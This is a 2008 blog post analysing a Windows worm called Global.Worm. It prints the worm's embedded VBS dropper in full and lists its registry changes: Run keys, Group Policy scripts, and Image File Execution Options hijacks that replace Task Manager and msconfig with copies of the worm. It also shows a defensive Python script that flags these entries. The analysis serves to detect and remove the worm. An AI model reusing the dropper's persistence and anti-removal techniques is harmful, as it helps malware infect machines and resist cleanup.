MorphostLab

Where Morphic and friends hang out

Global.Worm Analysis by Morphic

Posted by Morphic on September 29, 2008


Here it is, Global.Worm. Chew on this analysis.

(READ: the analysis below is not guaranteed to be entirely correct; I may have analysed something wrong!)

Analysis Results

Malware name: Global.Worm [Morphost], virus.Win32.Sality.z [KasperskyLab], W32.Silly.FDC [Symantec], W32/Sality.ag [McAfee]

Size: 286,720 bytes

Sample source: found by Morphost's heuristic detection

Icon: folder icon

CRC32: 55BC6B01 (of the file found)

MD5: 67CE8B53CBF5A1D3BF4269748F82ACCA (of the file found)

Built with: Visual Basic

Project directory at the time this virus was built (VB6 compiled executables embed the .vbp path, which is where this string comes from):

C:\Documents and Settings\TASDA.TASDA-B20F43BAE\Desktop07\Project1.vbp

The following VBS script was found inside it:

dim fs,rg
set fs = createobject("scripting.filesystemobject")
set rg = createobject("wscript.shell")
on error resume next
' Keep .vbs files runnable under WScript (a trailing "\" writes the key's default value)
rg.regwrite "HKCR\.vbs\", "VBSFile"
' Screensaver hijack: the worm copy starts as the screensaver after 30 seconds idle
rg.regwrite "HKCU\Control Panel\Desktop\SCRNSAVE.EXE", " C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"
rg.regwrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut", "30"
' Handler hijack: opening any .msc (mmc console) or .reg file launches the worm instead
rg.regwrite "HKCR\MSCFile\Shell\Open\Command\", "C:\WINDOWS\pchealth\Global.exe"
rg.regwrite "HKCR\regfile\Shell\Open\Command\", "C:\WINDOWS\pchealth\Global.exe"
' Autostart via the default values of RunOnce and Run
rg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\", "C:\WINDOWS\system32\dllcache\Default.exe"
rg.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\", "C:\WINDOWS\system32\dllcache\Default.exe"
rg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\", "C:\WINDOWS\system\KEYBOARD.exe"
' Overrides the MSCFile handler set above (HKEY_CLASSES_ROOT is the same hive as HKCR)
rg.regwrite "HKEY_CLASSES_ROOT\MSCFile\Shell\Open\Command\", "C:\WINDOWS\Fonts\Fonts.exe"
' Local Group Policy scripts: Boom.vbs runs at logoff (per user), shutdown and startup (machine)
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\DisplayName","Local Group Policy"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\FileSysPath",""
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\GPO-ID","LocalGPO"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\GPOName","Local Group Policy"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\SOM-ID","Local"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\Parameters",""
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\Script","C:\WINDOWS\Cursors\Boom.vbs"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\DisplayName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\FileSysPath", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\GPO-ID", "LocalGPO"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\GPOName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\SOM-ID", "Local"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\Parameters", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\Script", "C:\WINDOWS\Cursors\Boom.vbs"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\DisplayName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\FileSysPath", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\GPO-ID", "LocalGPO"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\GPOName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\SOM-ID", "Local"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\Parameters", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\Script", "C:\WINDOWS\Cursors\Boom.vbs"
' Drop copies of the worm body (stored as microsoft.hlp) under system-looking names;
' the stray trailing spaces inside two of the paths are in the original script
If Not fs.fileexists("C:\WINDOWS\Fonts\Fonts.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\Fonts\Fonts.exe")
If Not fs.fileexists("C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com")
If Not fs.fileexists("C:\WINDOWS\pchealth\Global.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\pchealth\Global.exe")
If Not fs.fileexists("C:\WINDOWS\system\KEYBOARD.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\system\KEYBOARD.exe")
If Not fs.fileexists("C:\WINDOWS\system32\dllcache\Default.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\system32\dllcache\Default.exe")
If Not fs.fileexists("C:\windows\system32\drivers\drivers.cab.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\system32\drivers\drivers.cab.exe ")
If Not fs.fileexists("C:\windows\media\rndll32.pif ") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\media\rndll32.pif")
If Not fs.fileexists("C:\windows\fonts\tskmgr.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\fonts\tskmgr.exe")

Creates files at:

"C:\windows\system32\dllcache\autorun.inf"

"C:\windows\Cursors\Boom.vbs"

and others.

Creates the following registry keys. Note the Image File Execution Options "Debugger" entries: Windows starts the named debugger in place of the program, so launching Task Manager, msconfig, Process Explorer or autoruns starts a copy of the worm instead.

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\comfile]
NeverShowExt = "1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile]
NeverShowExt = "1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSCFile\Shell\Open\Command]
(Default) = "%FontsDir%\Fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
DisableStatusMessages = 0x00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
sys = "%FontsDir%\Fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
(Default) = "%Windir%\system\KEYBOARD.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
(Default) = "%System%\dllcache\Default.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\auto.exe]
Debugger = "%System%\drivers\drivers.cab.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe]
Debugger = "%System%\drivers\drivers.cab.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe]
Debugger = "%System%\drivers\drivers.cab.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\boot.exe]
Debugger = "%FontsDir%\fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe]
Debugger = "%FontsDir%\Fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe]
Debugger = "%Windir%\Media\rndll32.pif"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe]
Debugger = "%Windir%\pchealth\helpctr\binaries\HelpHost.com"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe]
Debugger = "%FontsDir%\tskmgr.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Shutdown]
DisplayName = "Local Group Policy"
FileSysPath = ""
GPO-ID = "LocalGPO"
GPOName = "Local Group Policy"
SOM-ID = "Local"
Parameters = ""
Script = "%Windir%\Cursors\Boom.vbs"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup]
DisplayName = "Local Group Policy"
FileSysPath = ""
GPO-ID = "LocalGPO"
GPOName = "Local Group Policy"
SOM-ID = "Local"
Parameters = ""
Script = "%Windir%\Cursors\Boom.vbs"

[HKEY_CURRENT_USER\Control Panel\Desktop]
SCRNSAVE.EXE = "%Windir%\pchealth\helpctr\binaries\HelpHost.com"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
(Default) = "%System%\dllcache\Default.exe"

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\Scripts\Logoff]
DisplayName = "Local Group Policy"
FileSysPath = ""
GPO-ID = "LocalGPO"
GPOName = "Local Group Policy"
SOM-ID = "Local"
Parameters = ""
Script = "%Windir%\Cursors\Boom.vbs"

Deletes the original registry value (the legitimate .msc handler that the MSCFile entry above replaces):

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSCFile\Shell\Open\Command]
(Default) = "%SystemRoot%\system32\mmc.exe "%1" %*"

Modifies the following registry values. The misspelled SuperHidden ValueName detaches the "Show hidden files and folders" checkbox in Folder Options from the real ShowSuperHidden setting, so the user cannot unhide the dropped files through the UI:

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command]
(Default) = "%Windir%\pchealth\Global.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]
ValueName = "ShowSuperHiden"

[HKEY_CURRENT_USER\Control Panel\Desktop]
AutoEndTasks = "1"
ScreenSaveTimeOut = "30"
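As an added example (my own code, not part of the original post and not Morphost's), the following Python script reads an exported .reg file and flags every persistence trick the script and the registry listing above rely on: IFEO Debugger entries, a default value under Run/RunOnce, hijacked .msc/.reg open handlers, NeverShowExt on exe/com types, local Group Policy scripts, a screensaver that is not a .scr, and the misspelled SuperHidden ValueName. The embedded export is constructed to mirror the keys above, with two benign controls (piffile's NeverShowExt and a named Run value) that must not be flagged; the rule names and the hypothetical parse_reg/triage helpers are my own.

```python
"""Offline triage of a Windows .reg export for the persistence tricks seen in
Global.Worm (IFEO Debugger, Run default value, .msc/.reg handler hijack,
NeverShowExt, local-GPO scripts, non-.scr screensaver, tampered SuperHidden)."""
import re

# Constructed sample export mirroring the keys reported above, plus two benign
# controls (piffile legitimately has NeverShowExt; a named Run value is normal).
# It is not a capture from an infected machine.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile]
"NeverShowExt"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\piffile]
"NeverShowExt"=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSCFile\Shell\Open\Command]
@="C:\\WINDOWS\\Fonts\\Fonts.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
@="C:\\WINDOWS\\system\\KEYBOARD.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe]
"Debugger"="C:\\WINDOWS\\Fonts\\tskmgr.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup]
"GPOName"="Local Group Policy"
"Script"="C:\\WINDOWS\\Cursors\\Boom.vbs"
[HKEY_CURRENT_USER\Control Panel\Desktop]
"SCRNSAVE.EXE"="C:\\WINDOWS\\pchealth\\helpctr\\binaries\\HelpHost.com"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]
"ValueName"="ShowSuperHiden"
'''

# Legitimate open handlers for the file types the worm hijacks.
EXPECTED_HANDLER = {"mscfile": "mmc.exe", "regfile": "regedit.exe"}


def parse_reg(text):
    """Parse .reg text into {key: {value_name: data}}; the default value is "(Default)"."""
    hives, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] == ";" or line.startswith("Windows Registry Editor"):
            continue
        if line[0] == "[" and line[-1] == "]":
            current = line[1:-1]
            hives.setdefault(current, {})
            continue
        name, sep, data = line.partition("=")
        if current is None or not sep:
            continue
        name = "(Default)" if name == "@" else name.strip('"')
        if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
            data = data[1:-1].replace('\\\\', '\\').replace('\\"', '"')  # undo .reg escapes
        elif data.lower().startswith("dword:"):
            data = int(data[6:], 16)
        # hex:/multi-line values are kept as raw text; none of the rules need them
        hives[current][name] = data
    return hives


def _get(values, name):
    """Case-insensitive value lookup (registry value names are case-insensitive)."""
    return next((v for k, v in values.items() if k.lower() == name.lower()), None)


def triage(hives):
    """Return (rule, key, value_name, data) tuples for each suspicious entry."""
    findings = []
    for key, values in hives.items():
        k = key.lower()
        leaf = k.rsplit("\\", 1)[-1]
        dflt, dbg = _get(values, "(Default)"), _get(values, "Debugger")
        # IFEO: Windows launches the "Debugger" in place of the named program.
        if "\\image file execution options\\" in k and dbg is not None:
            findings.append(("ifeo_debugger", key, "Debugger", dbg))
        # Run/RunOnce normally carry named values only; a default value is a red flag.
        if leaf in ("run", "runonce") and dflt is not None:
            findings.append(("run_default_value", key, "(Default)", dflt))
        # .msc/.reg handler that no longer points at mmc.exe / regedit.exe.
        m = re.search(r"\\classes\\(mscfile|regfile)\\shell\\open\\command$", k)
        if m and EXPECTED_HANDLER[m.group(1)] not in str(dflt or "").lower():
            findings.append(("handler_hijack", key, "(Default)", dflt))
        # NeverShowExt on exe/com hides the real extension ("Fonts.exe" shows as "Fonts").
        nse = _get(values, "NeverShowExt")
        if re.search(r"\\classes\\(exefile|comfile)$", k) and nse is not None:
            findings.append(("never_show_ext", key, "NeverShowExt", nse))
        # Local GPO scripts run at boot/shutdown/logoff independently of the Run keys.
        script = _get(values, "Script")
        if re.search(r"\\scripts\\(startup|shutdown|logon|logoff)(\\|$)", k) and script:
            findings.append(("gpo_script", key, "Script", script))
        # A screensaver that is not a .scr is a dropped executable in disguise.
        scr = _get(values, "SCRNSAVE.EXE")
        if k.endswith("\\control panel\\desktop") and scr and not str(scr).strip().lower().endswith(".scr"):
            findings.append(("screensaver_hijack", key, "SCRNSAVE.EXE", scr))
        # A renamed ValueName detaches the "Show hidden files" checkbox from the real setting.
        vn = _get(values, "ValueName")
        if k.endswith("\\folder\\superhidden") and vn is not None and vn != "ShowSuperHidden":
            findings.append(("superhidden_tamper", key, "ValueName", vn))
    return findings


if __name__ == "__main__":
    for rule, key, name, data in triage(parse_reg(SAMPLE_REG)):
        print(f"{rule:19} {key} :: {name} = {data!r}")
```

Export the suspect hives with reg.exe export (or from an offline copy of the hive files) and pass the text to parse_reg. Remove the flagged IFEO Debugger entries before anything else; until they are gone, starting Task Manager or Process Explorer to kill the worm only launches another copy of it.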

=============================================================================

This worm can be cleaned with Morphost Antivirus. [NB: Morphost has since been updated, so please download the new Morphost.]

I have added this worm's signature to the Morphost database, so you can now use Morphost to scan your computer for Global.Worm.

If Global.Worm still won't leave your computer, do the following:

-Select the Settings tab

-Select the option "let users make their database themselves" in the "database" frame

-Then add just one sample of Global.Worm

-And scan right away!

By: Morphic

http://www.friendster.com/morphic (Friendster)

https://morphians.wordpress.com (my blog)

karta_morphic@yahoo.co.id (my email)

http://morphic.4shared.com (download Morphost and the Morphost database here!)

and don't forget to join MorphostLab (Friendster group)

My thanks go to Anharku, MorphostLab, the Permata Setia Budi kids, the Smansa Medan kids, the kids of class XII IPA 10 Smansa Medan, and others.
